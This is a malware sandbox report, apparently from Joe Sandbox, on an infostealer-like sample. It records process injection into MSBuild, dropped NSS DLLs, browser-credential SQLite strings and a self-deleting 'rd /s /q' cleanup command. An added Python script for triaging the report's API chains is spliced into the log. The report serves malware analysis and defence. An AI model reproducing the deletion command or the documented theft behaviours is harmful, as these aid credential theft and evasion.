Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CCBA9A0 1_2_6CCBA9A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CCC09B0 1_2_6CCC09B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CC38960 1_2_6CC38960
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CC56900 1_2_6CC56900
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 8_2_001B2021 8_2_001B2021
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 8_2_001E2088 8_2_001E2088
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 8_2_001E40C8 8_2_001E40C8
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 8_2_0020E132 8_2_0020E132
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 8_2_001E2123 8_2_001E2123
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 8_2_0020E1A8 8_2_0020E1A8
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 8_2_001DE1CF 8_2_001DE1CF
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 8_2_001E8278 8_2_001E8278
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 8_2_001DE27B 8_2_001DE27B
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 8_2_001DE272 8_2_001DE272
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 8_2_001DE455 8_2_001DE455
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 8_2_001E0488 8_2_001E0488
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 8_2_001DE527 8_2_001DE527
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 8_2_0020E738 8_2_0020E738
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 8_2_00218798 8_2_00218798
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 8_2_00224988 8_2_00224988
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 8_2_001FAA47 8_2_001FAA47
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 8_2_001E4AC8 8_2_001E4AC8
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 8_2_001BCAF2 8_2_001BCAF2
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 8_2_001E6D40 8_2_001E6D40
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 8_2_001E8D88 8_2_001E8D88
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 8_2_0020AD84 8_2_0020AD84
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 8_2_00224E98 8_2_00224E98
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 8_2_001EEF08 8_2_001EEF08
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 8_2_00220F18 8_2_00220F18
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 8_2_00226FA8 8_2_00226FA8
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 8_2_001EB078 8_2_001EB078
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 8_2_002151A8 8_2_002151A8
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 8_2_001E71D8 8_2_001E71D8
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 8_2_001B729C 8_2_001B729C
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 8_2_001CD39B 8_2_001CD39B
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 8_2_002133C8 8_2_002133C8
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 8_2_001F94C8 8_2_001F94C8
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 8_2_001C572C 8_2_001C572C
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 8_2_0021B778 8_2_0021B778
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 8_2_00221918 8_2_00221918
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 8_2_001CBB36 8_2_001CBB36
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 8_2_00209BA8 8_2_00209BA8
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 8_2_001C3C92 8_2_001C3C92
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 8_2_001B1D79 8_2_001B1D79
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 8_2_001E7DE8 8_2_001E7DE8
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 8_2_001DDED8 8_2_001DDED8
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 8_2_001BFEF0 8_2_001BFEF0
Source: Joe Sandbox View Dropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
Source: Joe Sandbox View Dropped File: C:\ProgramData\mozglue.dll BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: String function: 004047E8 appears 38 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: String function: 6CB994D0 appears 90 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: String function: 6CD809D0 appears 89 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: String function: 004104BC appears 37 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: String function: 004105DE appears 71 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: String function: 6CB8CBE8 appears 134 times
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: String function: 001B7B80 appears 49 times
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: String function: 001FA1D8 appears 152 times
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: String function: 001E9978 appears 93 times
Source: C:\Users\user\Desktop\T2bmenoX1o.exe Code function: String function: 00DB7B80 appears 49 times
Source: C:\Users\user\Desktop\T2bmenoX1o.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7284 -s 272
Source: T2bmenoX1o.exe, 00000000.00000002.1811329815.0000000000E40000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameproquota.exej% vs T2bmenoX1o.exe
Source: T2bmenoX1o.exe Binary or memory string: OriginalFilenameproquota.exej% vs T2bmenoX1o.exe
Source: T2bmenoX1o.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: T2bmenoX1o.exe Static PE information: Section: .data ZLIB complexity 0.9919220753205128
Source: AAFIIJDAAA.exe.1.dr Static PE information: Section: .data ZLIB complexity 0.9912177666083916
Source: a43486128347[1].exe.1.dr Static PE information: Section: .data ZLIB complexity 0.9912177666083916
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@14/37@13/5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CBB7030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree, 1_2_6CBB7030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_0041147A CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle, 1_2_0041147A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_0041196C __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z,__EH_prolog3_catch,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,CoSetProxyBlanket,VariantInit,VariantClear, 1_2_0041196C
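The "Code function" entries in this report (the GDI chain at 1_2_00411F2A, the GetCurrentProcess/NtQueryInformationProcess pair at 1_2_0040145B, the Toolhelp32 chain at 1_2_0041147A and the COM chain at 1_2_0041196C above) are easier to triage once the API sequences are pulled out of the line format and tagged by behaviour. The Python below is an added example, not part of the Joe Sandbox output and not code from the sample: it parses lines in this report's "Source: <path> Code function: <id> <api,api,...>, <id>" layout and tags each chain. The tag names and the API-to-behaviour rules are the example's own heuristics (GetDesktopWindow + CreateCompatibleBitmap + BitBlt is a screen grab, CreateToolhelp32Snapshot/Process32First/Process32Next is process enumeration, NtQueryInformationProcess is commonly a debugger or parent-process check, CoInitializeSecurity + CoCreateInstance + CoSetProxyBlanket is the usual client setup for a WMI query); the five sample lines are copied from this report.

```python
import re
from typing import Optional

# Matches this report's "Code function" lines: the function id is repeated at the
# end of the line, and the API chain (when present) sits between the two copies.
_CODE_FUNC = re.compile(
    r"^Source: (?P<src>.+?) Code function: "
    r"(?P<fid>\d+_\d+_[0-9A-Fa-f]+) (?:(?P<apis>\S+) )?(?P=fid)$"
)

# Behaviour rules: a chain gets a tag when it contains every API in the set.
# These mappings are the example's own heuristics, not report output.
RULES = {
    "screen_capture": {"GetDesktopWindow", "CreateCompatibleBitmap", "BitBlt"},
    "process_enumeration": {"CreateToolhelp32Snapshot", "Process32First", "Process32Next"},
    "process_info_query": {"NtQueryInformationProcess"},  # often a debugger/parent check
    "com_client_init": {"CoInitializeSecurity", "CoCreateInstance", "CoSetProxyBlanket"},  # typical WMI client setup
}


def parse_line(line: str) -> Optional[dict]:
    """Return {'src', 'fid', 'apis'} for a Code function line, else None."""
    m = _CODE_FUNC.match(line.strip())
    if not m:
        return None
    raw = m.group("apis") or ""
    apis = [a for a in raw.split(",") if a]  # drop the trailing empty element
    return {"src": m.group("src"), "fid": m.group("fid"), "apis": apis}


def classify(apis: list) -> set:
    """Every rule whose API set is fully present in the chain."""
    present = set(apis)
    return {tag for tag, needed in RULES.items() if needed <= present}


def triage(lines: list) -> list:
    """Keep only chains that match at least one rule, as (fid, src, tags)."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec and rec["apis"]:
            tags = classify(rec["apis"])
            if tags:
                hits.append((rec["fid"], rec["src"], tags))
    return hits


# Sample input copied from this report (a constructed list, not a live feed).
SAMPLE = [
    "Source: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\MSBuild.exe Code function: 1_2_00411F2A CreateStreamOnHGlobal,GetDesktopWindow,GetWindowRect,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GetHGlobalFromStream,GlobalLock,GlobalSize,SelectObject,DeleteObject,DeleteObject,ReleaseDC,CloseWindow, 1_2_00411F2A",
    "Source: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\MSBuild.exe Code function: 1_2_0040145B GetCurrentProcess,NtQueryInformationProcess, 1_2_0040145B",
    "Source: C:\\Users\\user\\Desktop\\T2bmenoX1o.exe Code function: 0_2_00DB2021 0_2_00DB2021",
    "Source: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\MSBuild.exe Code function: 1_2_0041147A CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle, 1_2_0041147A",
    "Source: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\MSBuild.exe Code function: 1_2_0041196C __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z,__EH_prolog3_catch,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,CoSetProxyBlanket,VariantInit,VariantClear, 1_2_0041196C",
]

if __name__ == "__main__":
    for fid, src, tags in triage(SAMPLE):
        print(f"{fid}  {sorted(tags)}  ({src.rsplit(chr(92), 1)[-1]})")
```

Lines without an API chain (the bare "0_2_00DB2021 0_2_00DB2021" entries) parse to an empty list and are skipped by triage(); "String function" lines do not match at all. The rules are deliberately conservative: a chain is tagged only when every API in the rule set is present, so a lone GetDC or CoCreateInstance in unrelated code does not fire.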
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\MW3EJX4O.htm Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7284
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8128:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7968
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File created: C:\Users\user\AppData\Local\Temp\delays.tmp Jump to behavior
Source: C:\ProgramData\AAFIIJDAAA.exe Command line argument: MZx 8_2_001B2021
Source: T2bmenoX1o.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\T2bmenoX1o.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: MSBuild.exe, 00000001.00000002.2246850104.00000000323C1000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.1.dr, softokn3.dll.1.dr Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: MSBuild.exe, 00000001.00000002.2238905953.0000000020218000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2259380459.000000006CD8F000.00000002.00000001.01000000.00000008.sdmp, MSBuild.exe, 00000001.00000002.2231134063.000000001A2AE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2251682068.000000003E2AE000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr, nss3[1].dll.1.dr, sql[1].dll.1.dr Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: MSBuild.exe, 00000001.00000002.2246850104.00000000323C1000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.1.dr, softokn3.dll.1.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: MSBuild.exe, 00000001.00000002.2238905953.0000000020218000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2259380459.000000006CD8F000.00000002.00000001.01000000.00000008.sdmp, MSBuild.exe, 00000001.00000002.2231134063.000000001A2AE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2251682068.000000003E2AE000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr, nss3[1].dll.1.dr, sql[1].dll.1.dr Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: MSBuild.exe, 00000001.00000002.2238905953.0000000020218000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2259380459.000000006CD8F000.00000002.00000001.01000000.00000008.sdmp, MSBuild.exe, 00000001.00000002.2231134063.000000001A2AE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2251682068.000000003E2AE000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr, nss3[1].dll.1.dr, sql[1].dll.1.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: MSBuild.exe, 00000001.00000002.2238905953.0000000020218000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2259380459.000000006CD8F000.00000002.00000001.01000000.00000008.sdmp, MSBuild.exe, 00000001.00000002.2231134063.000000001A2AE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2251682068.000000003E2AE000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr, nss3[1].dll.1.dr, sql[1].dll.1.dr Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: MSBuild.exe, 00000001.00000002.2246850104.00000000323C1000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.1.dr, softokn3.dll.1.dr Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: MSBuild.exe, 00000001.00000002.2238905953.0000000020218000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2231134063.000000001A2AE000.00000004.00000020.00020000.00000000.sdmp, sql[1].dll.1.dr Binary or memory string: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');
Source: MSBuild.exe, 00000001.00000002.2246850104.00000000323C1000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.1.dr, softokn3.dll.1.dr Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: MSBuild.exe, 00000001.00000002.2246850104.00000000323C1000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.1.dr, softokn3.dll.1.dr Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: MSBuild.exe, 00000001.00000002.2246850104.00000000323C1000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.1.dr, softokn3.dll.1.dr Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: MSBuild.exe, 00000001.00000002.2238905953.0000000020218000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2231134063.000000001A2AE000.00000004.00000020.00020000.00000000.sdmp, sql[1].dll.1.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
Source: MSBuild.exe, 00000001.00000002.2246850104.00000000323C1000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.1.dr, softokn3.dll.1.dr Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: MSBuild.exe, MSBuild.exe, 00000001.00000002.2238905953.0000000020218000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2259380459.000000006CD8F000.00000002.00000001.01000000.00000008.sdmp, MSBuild.exe, 00000001.00000002.2231134063.000000001A2AE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2251682068.000000003E2AE000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr, nss3[1].dll.1.dr, sql[1].dll.1.dr Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: MSBuild.exe, 00000001.00000002.2238905953.0000000020218000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2259380459.000000006CD8F000.00000002.00000001.01000000.00000008.sdmp, MSBuild.exe, 00000001.00000002.2231134063.000000001A2AE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2251682068.000000003E2AE000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr, nss3[1].dll.1.dr, sql[1].dll.1.dr Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: MSBuild.exe, 00000001.00000002.2246850104.00000000323C1000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.1.dr, softokn3.dll.1.dr Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: MSBuild.exe, 00000001.00000002.2238905953.0000000020218000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2231134063.000000001A2AE000.00000004.00000020.00020000.00000000.sdmp, sql[1].dll.1.dr Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,nexec INT,ncycle INT,stmt HIDDEN);
Source: CAAKKF.1.dr Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: MSBuild.exe, 00000001.00000002.2238905953.0000000020218000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2231134063.000000001A2AE000.00000004.00000020.00020000.00000000.sdmp, sql[1].dll.1.dr Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: MSBuild.exe, 00000001.00000002.2246850104.00000000323C1000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.1.dr, softokn3.dll.1.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: MSBuild.exe, 00000001.00000002.2238905953.0000000020218000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2231134063.000000001A2AE000.00000004.00000020.00020000.00000000.sdmp, sql[1].dll.1.dr Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: MSBuild.exe, 00000001.00000002.2246850104.00000000323C1000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.1.dr, softokn3.dll.1.dr Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
Source: T2bmenoX1o.exe Virustotal: Detection: 44%
Source: unknown Process created: C:\Users\user\Desktop\T2bmenoX1o.exe "C:\Users\user\Desktop\T2bmenoX1o.exe"
Source: C:\Users\user\Desktop\T2bmenoX1o.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Users\user\Desktop\T2bmenoX1o.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7284 -s 272
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process created: C:\ProgramData\AAFIIJDAAA.exe "C:\ProgramData\AAFIIJDAAA.exe"
Source: C:\ProgramData\AAFIIJDAAA.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\ProgramData\AAFIIJDAAA.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7968 -s 248
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\KJKFBAFIDAEB" & exit
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
Source: C:\Users\user\Desktop\T2bmenoX1o.exe Section loaded: apphelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: wininet.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: rstrtmgr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ncrypt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ntasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: dbghelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: iertutil.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: winhttp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: winnsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: urlmon.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: srvcli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: netutils.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: dnsapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: rasadhlp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: schannel.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: msasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: dpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: gpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: wbemcomn.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: amsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: userenv.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: sxs.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ntmarta.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: mozglue.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: wsock32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: vcruntime140.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: msvcp140.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: windowscodecs.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: propsys.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: edputil.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: wintypes.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: appresolver.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: bcp47langs.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: slc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: sppc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: apphelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: pcacli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: mpr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: sfc_os.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: windows.fileexplorer.common.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ntshrui.dll
